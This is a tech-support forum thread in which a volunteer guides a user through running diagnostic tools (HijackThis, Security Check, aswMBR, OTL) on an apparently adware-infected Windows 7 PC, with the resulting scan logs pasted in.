Jump to content

Build Theme!
  •  
  • Infected?

WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. :D Join 91983 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!


Photo

Possible malware. Browser/programs takes long time to load..lots of ru


  • This topic is locked This topic is locked
19 replies to this topic

#1 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 02 January 2014 - 07:07 AM

This started a couple of weeks ago, when I first noticed that Firefox takes about 3-4minutes to load. Also my computer is seemingly always "processing" something. It gets no rest if you know what I mean(it's never idle?)

 

Other oddities, my browser's home page reset itself to a default search engine and somehow NoScript uninstall itself. My system also takes forever to shutdown.

 

I've ran Malwarebytes 2 days ago and it did pick up 3 problematic files, but I know there has to be more than that..

 

Here my Hijackthis log.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 8:00:59 AM, on 1/2/2014
Platform: Windows 7  (WinNT 6.00.3504)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Windows\SysWOW64\rundll32.exe
C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCU.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
C:\Users\Wesley\Desktop\HiJackThis(1).exe
C:\Windows\SysWOW64\DllHost.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: YTNavAssistPlugin Class - {81017EA9-9AA8-4A6A-9734-7AF40E7D593F} - C:\PROGRA~2\Yahoo!\Companion\Installs\cpn0\yt.dll
O2 - BHO: DeAlEoxipRRESs - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.dll
O2 - BHO: FuanDEals - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.dll
O4 - HKLM\..\Run: [BCU] "C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCU.exe"
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [NCUpdateHelper] C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe
O4 - HKLM\..\Run: [mobilegeni daemon] C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
O4 - HKCU\..\Run: [NextLive] C:\Windows\SysWOW64\rundll32.exe "C:\Users\Wesley\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
O8 - Extra context menu item: Download with &Media Finder - C:\Program Files (x86)\Media Finder\hook.html
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\vsocklib.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O20 - AppInit_DLLs: c:\progra~3\webplat\webplat.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Arc Service (ArcService) - Perfect World Entertainment Inc - C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe
O23 - Service: Browser Configuration Utility Service (BCUService) - DeviceVM, Inc. - C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCUService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Dragon Age: Origins - Content Updater (DAUpdaterSvc) - BioWare - C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ES lite Service for program management. (ES lite Service) - Unknown owner - C:\Program Files (x86)\Gigabyte\EasySaver\ESSVR.EXE
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: FLEXnet Licensing Service 64 - Flexera Software, Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: MBAMScheduler - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
O23 - Service: MBAMService - Malwarebytes Corporation - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\Windows\system32\GameMon.des.exe (file missing)
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Update Jump Flip - Unknown owner - C:\Program Files (x86)\Jump Flip\updateJumpFlip.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\Windows\system32\vmnetdhcp.exe
O23 - Service: VMware USB Arbitration Service (VMUSBArbService) - VMware, Inc. - C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
O23 - Service: VMware NAT Service - VMware, Inc. - C:\Windows\system32\vmnat.exe
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 10014 bytes


Edited by Midnight Sky, 02 January 2014 - 07:57 AM.

    Advertisements

Register to Remove


#2 OCD

OCD

    SuperHelper

  • Malware Team
  • 5,574 posts

Posted 02 January 2014 - 06:36 PM

Hi Midnight Sky,

My name is OCD. I would be more than happy to take a look at your log and help you with solving any malware problems you might have. Logs can take a while to research, so please be patient and know that I am working hard to get you a clean and functional system back in your hands. I'd be grateful if you would note the following:
  • I will be working on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The fixes are specific to your problem and should only be used for the issues on this machine.
  • Please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear.
  • It's often worth reading through these instructions and printing them for ease of reference.
  • If you don't know or understand something, please don't hesitate to say or ask!! It's better to be sure and safe than sorry.
  • Please reply to this thread. Do not start a new topic.
  • Copy and Paste logs directly into the reply window. DO NOT attach the logs unless specifically instructed to do so.
IMPORTANT NOTE : Please do not delete, download or install anything unless instructed to do so.

DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your Operating System and losing all your programs and data.

Please stay with this topic until I let you know that your system appears to be "All Clear"

Important: All tools MUST be run from the Desktop.

=========================

bullseye_zpse9eaf36e.gif Security Check

Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document.
=========================

bullseye_zpse9eaf36e.gif aswMBR

Download aswMBR.exe and save it to your desktop.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • When asked if you want to download Avast's virus definitions please select Yes.
  • Click Scan
  • Upon completion of the scan, click Save log and save it to your desktop, and post that log in your next reply for review. Note - do NOT attempt any Fix yet.
  • You will also notice another file created on the desktop named MBR.dat. Right click that file and select Send To>Compressed (zipped) file. Attach that zipped file in your next reply as well.
=========================
bullseye_zpse9eaf36e.gif OTL

Download OTL to your desktop.
  • Make sure all other windows are closed and to let it run uninterrupted.
    • Windows XP : Double click on the icon to run it.
    • Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
  • When the window appears, underneath Output at the top change it to Minimal Output.
  • Check the boxes beside LOP Check and Purity Check.
  • Under Custom Scan paste this in

    %USERPROFILE%\..|smtmp;true;true;true /FP
    %temp%\smtmp\*.* /s >
    /md5start
    iexplore.*
    explorer.*
    winlogon.*
    dll
    zx.dll
    hlp.dat
    consrv.dll
    services.*
    /md5stop
    netsvcs
    drivers32
    %SYSTEMDRIVE%\*.*
    %systemroot%\Fonts\*.com
    %systemroot%\Fonts\*.dll
    %systemroot%\Fonts\*.ini
    %systemroot%\Fonts\*.ini2
    %systemroot%\Fonts\*.exe
    %systemroot%\system32\spool\prtprocs\w32x86\*.*
    %systemroot%\REPAIR\*.bak1
    %systemroot%\REPAIR\*.ini
    %systemroot%\system32\*.jpg
    %systemroot%\*.jpg
    %systemroot%\*.png
    %systemroot%\*.scr
    %systemroot%\*._sy
    %APPDATA%\Adobe\Update\*.*
    %ALLUSERSPROFILE%\Favorites\*.*
    %APPDATA%\Microsoft\*.*
    %PROGRAMFILES%\*.*
    %APPDATA%\Update\*.*
    %systemroot%\*. /mp /s
    dir "%systemdrive%\*" /S /A:L /C
    CREATERESTOREPOINT
    %systemroot%\System32\config\*.sav
    %PROGRAMFILES%\bak. /s
    %systemroot%\system32\bak. /s
    %ALLUSERSPROFILE%\Start Menu\*.lnk /x
    %systemroot%\system32\config\systemprofile\*.dat /x
    %systemroot%\*.config
    %systemroot%\system32\*.db
    %PROGRAMFILES%\Internet Explorer\*.dat
    %APPDATA%\Microsoft\Internet Explorer\Quick Launch\*.lnk /x
    %USERPROFILE%\Desktop\*.exe
    %PROGRAMFILES%\Common Files\*.*
    %systemroot%\*.src
    %systemroot%\install\*.*
    %systemroot%\system32\DLL\*.*
    %systemroot%\system32\HelpFiles\*.*
    %systemroot%\system32\rundll\*.*
    %systemroot%\winn32\*.*
    %systemroot%\Java\*.*
    %systemroot%\system32\test\*.*
    %systemroot%\system32\Rundll32\*.*
    %systemroot%\AppPatch\Custom\*.*
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs
    BASESERVICES
    DRIVES
    CREATERESTOREPOINT
  • Click the Run Scan button. Do not change any settings unless otherwise told to do so. The scan wont take long.
    • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
    • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post it with your next reply.
    • You may need two posts to fit them both in.
=========================

In your next post please provide the following:
  • checkup.txt
  • aswMBR.txt
  • attach MBR.zip
  • OTL.txt
  • Extras.txt

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days








If you are satisfied with the help you have received, please consider making a donation.


#3 Midnight Sky

Midnight Sky

    New Member

  • Authentic Member
  • Pip
  • 9 posts

Posted 03 January 2014 - 07:36 AM

Gotta point out one thing. If you see something called "Public_Executions_Tutorial". Don't freak out with that ^^;;; it's just a mod I'm whipping up for Skyrim. I've had to come here a few times for previous fixes, so there maybe left over programs.   Anyway, moving on along..

 

Security Check:

 

 

 

Results of screen317's Security Check version 0.99.78  
 Windows 7  x64 (UAC is disabled!)  
 Out of date service pack!!
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 Malwarebytes Anti-Malware version 1.75.0.1300  
 JavaFX 2.1.0    
 Java™ 6 Update 34  
 Java 7 Update 6  
 Java™ SE Development Kit 6 Update 34
 Java version out of Date!
 Adobe Flash Player 11.9.900.170  
 Adobe Reader 10.1.4 Adobe Reader out of Date!  
 Mozilla Firefox (26.0)
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes' Anti-Malware mbamscheduler.exe   
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````
 

 

aswMBR

 

 

 

aswMBR version 0.9.9.1771 Copyright© 2011 AVAST Software
Run date: 2014-01-02 23:22:04
-----------------------------
23:22:04.084    OS Version: Windows x64 6.1.7600
23:22:04.084    Number of processors: 6 586 0x200
23:22:04.084    ComputerName: VERONICA  UserName: Wesley
23:22:07.311    Initialize success
23:23:07.425    AVAST engine defs: 14010201
23:23:19.423    Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0
23:23:19.426    Disk 0 Vendor: Hitachi_HDS721010CLA332 JP4OA3EA Size: 953869MB BusType: 3
23:23:19.429    Disk 1  \Device\Harddisk1\DR1 -> \Device\Ide\IdeDeviceP2T0L0-3
23:23:19.432    Disk 1 Vendor: WDC_WD20EARX-00PASB0 51.0AB51 Size: 1907729MB BusType: 3
23:23:19.437    Disk 2  \Device\Harddisk2\DR2 -> \Device\Ide\IdeDeviceP2T1L0-5
23:23:19.441    Disk 2 Vendor: WDC_WD20EARX-00PASB0 51.0AB51 Size: 1907729MB BusType: 3
23:23:19.500    Disk 0 MBR read successfully
23:23:19.504    Disk 0 MBR scan
23:23:19.511    Disk 0 Windows 7 default MBR code
23:23:19.522    Disk 0 Partition 1 80 (A) 07    HPFS/NTFS NTFS          100 MB offset 2048
23:23:19.534    Disk 0 Partition 2 00     07    HPFS/NTFS NTFS       953767 MB offset 206848
23:23:19.566    Disk 0 scanning C:\Windows\system32\drivers
23:23:27.644    Service scanning
23:23:50.086    Modules scanning
23:23:50.101    Disk 0 trace - called modules:
23:23:50.132    ntoskrnl.exe CLASSPNP.SYS disk.sys ACPI.sys ataport.SYS pciide.sys PCIIDEX.SYS hal.dll atapi.sys
23:23:50.138    1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa8004a5f060]
23:23:50.143    3 CLASSPNP.SYS[fffff8800190243f] -> nt!IofCallDriver -> [0xfffffa80047bce40]
23:23:50.149    5 ACPI.sys[fffff88000ed4781] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-0[0xfffffa80047dc060]
23:23:52.910    AVAST engine scan C:\Windows
23:23:55.544    AVAST engine scan C:\Windows\system32
23:26:52.800    AVAST engine scan C:\Windows\system32\drivers
23:27:47.323    AVAST engine scan C:\Users\Wesley
00:04:27.427    File: C:\Users\Wesley\Desktop\Oblivion Mods\dds(1).scr  **INFECTED** Win32:Malware-gen
00:56:57.118    AVAST engine scan C:\ProgramData
01:00:27.107    Scan finished successfully
07:45:59.049    Disk 0 MBR has been saved successfully to "C:\Users\Wesley\Desktop\MBR.dat"
07:45:59.054    The log file has been saved successfully to "C:\Users\Wesley\Desktop\aswMBR.txt"

 

MBR has been attached.

 

OTL

 

 

 

OTL logfile created on: 1/3/2014 7:51:02 AM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Wesley\Desktop
64bit- Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.98 Gb Total Physical Memory | 1.67 Gb Available Physical Memory | 42.03% Memory free
7.96 Gb Paging File | 5.30 Gb Available in Paging File | 66.62% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 235.24 Gb Free Space | 25.26% Space Free | Partition Type: NTFS
Drive D: | 6.85 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: UDF
Drive H: | 1863.01 Gb Total Space | 21.24 Gb Free Space | 1.14% Space Free | Partition Type: NTFS
Drive M: | 1863.01 Gb Total Space | 29.76 Gb Free Space | 1.60% Space Free | Partition Type: NTFS
 
Computer Name: VERONICA | User Name: Wesley | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - C:\Users\Wesley\Desktop\OTL(1).exe (OldTimer Tools)
PRC - C:\Users\Wesley\Desktop\aswMBR.exe (AVAST Software)
PRC - C:\Users\Wesley\Desktop\SecurityCheck.exe ()
PRC - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe (Adobe Systems, Inc.)
PRC - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
PRC - C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
PRC - C:\Program Files (x86)\Notepad++\notepad++.exe (Don HO don.h@free.fr)
PRC - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
PRC - C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
PRC - C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
PRC - C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
PRC - C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
PRC - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
PRC - C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
PRC - C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCUService.exe (DeviceVM, Inc.)
PRC - C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCU.exe (DeviceVM, Inc.)
PRC - C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation)
 
 
========== Modules (No Company Name) ==========
 
MOD - C:\Users\Wesley\Desktop\SecurityCheck.exe ()
MOD - c:\ProgramData\WebPlat\WebPlat.dll ()
MOD - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
MOD - C:\Program Files (x86)\Mozilla Firefox\mozjs.dll ()
MOD - C:\Program Files\TortoiseGit\bin\zlib132.dll ()
MOD - C:\Program Files\TortoiseGit\bin\libgit232.dll ()
MOD - C:\Program Files (x86)\Notepad++\plugins\ComparePlugin.dll ()
MOD - C:\Program Files\TortoiseSVN\bin\libsasl32.dll ()
MOD - C:\Program Files (x86)\Notepad++\plugins\NppFTP.dll ()
MOD - C:\Program Files (x86)\Notepad++\plugins\NppExport.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll ()
MOD - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ()
MOD - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\Nv3DVStreaming.dll ()
MOD - C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\sqlite3.dll ()
MOD - C:\Program Files (x86)\Notepad++\plugins\NppNetNote.dll ()
MOD - C:\Program Files (x86)\Notepad++\plugins\Config\tidy\libTidy.dll ()
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - (FLEXnet Licensing Service 64) -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe (Flexera Software, Inc.)
SRV:64bit: - (mi-raysat_3dsmax2012_64) -- C:\Program Files\Autodesk\3ds Max 2012\mentalimages\satellite\raysat_3dsmax2012_64server.exe ()
SRV:64bit: - (AMD External Events Utility) -- C:\Windows\SysNative\atiesrxx.exe (AMD)
SRV:64bit: - (976137e5) -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
SRV:64bit: - (msvsmon90) -- C:\Program Files\Microsoft Visual Studio 9.0\Common7\IDE\Remote Debugger\x64\msvsmon.exe (Microsoft Corporation)
SRV - (AdobeFlashPlayerUpdateSvc) -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe (Adobe Systems Incorporated)
SRV - (DAUpdaterSvc) -- C:\Program Files (x86)\Steam\steamapps\common\Dragon Age Ultimate Edition\bin_ship\DAUpdaterSvc.Service.exe (BioWare)
SRV - (MozillaMaintenance) -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe (Mozilla Foundation)
SRV - (ArcService) -- C:\Program Files (x86)\Perfect World Entertainment\Arc\ArcService.exe (Perfect World Entertainment Inc)
SRV - (MBAMService) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe (Malwarebytes Corporation)
SRV - (MBAMScheduler) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation)
SRV - (SkypeUpdate) -- C:\Program Files (x86)\Skype\Updater\Updater.exe (Skype Technologies)
SRV - (AdobeARMservice) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Systems Incorporated)
SRV - (clr_optimization_v4.0.30319_32) -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe (Microsoft Corporation)
SRV - (npggsvc) -- C:\Windows\SysWOW64\GameMon.des (INCA Internet Co., Ltd.)
SRV - (VMnetDHCP) -- C:\Windows\SysWOW64\vmnetdhcp.exe (VMware, Inc.)
SRV - (VMware NAT Service) -- C:\Windows\SysWOW64\vmnat.exe (VMware, Inc.)
SRV - (VMAuthdService) -- C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe (VMware, Inc.)
SRV - (sftvsa) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe (Microsoft Corporation)
SRV - (sftlist) -- C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe (Microsoft Corporation)
SRV - (VMUSBArbService) -- C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe (VMware, Inc.)
SRV - (Steam Client Service) -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe (Valve Corporation)
SRV - (FLEXnet Licensing Service) -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe (Macrovision Europe Ltd.)
SRV - (Stereo Service) -- C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation)
SRV - (ES lite Service) -- C:\Program Files (x86)\Gigabyte\EasySaver\essvr.exe ()
SRV - (BCUService) -- C:\Program Files (x86)\DeviceVM\Browser Configuration Utility\BCUService.exe (DeviceVM, Inc.)
SRV - (clr_optimization_v2.0.50727_32) -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (YahooAUService) -- C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Yahoo! Inc.)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - (MBAMProtector) -- C:\Windows\SysNative\drivers\mbam.sys (Malwarebytes Corporation)
DRV:64bit: - (VBoxNetAdp) -- C:\Windows\SysNative\drivers\VBoxNetAdp.sys (Oracle Corporation)
DRV:64bit: - (USBAAPL64) -- C:\Windows\SysNative\drivers\usbaapl64.sys (Apple, Inc.)
DRV:64bit: - (GEARAspiWDM) -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys (GEAR Software Inc.)
DRV:64bit: - (vmx86) -- C:\Windows\SysNative\drivers\vmx86.sys (VMware, Inc.)
DRV:64bit: - (VMparport) -- C:\Windows\SysNative\drivers\VMparport.sys (VMware, Inc.)
DRV:64bit: - (vmkbd) -- C:\Windows\SysNative\drivers\VMkbd.sys (VMware, Inc.)
DRV:64bit: - (VMnetuserif) -- C:\Windows\SysNative\drivers\vmnetuserif.sys (VMware, Inc.)
DRV:64bit: - (VMnetBridge) -- C:\Windows\SysNative\drivers\vmnetbridge.sys (VMware, Inc.)
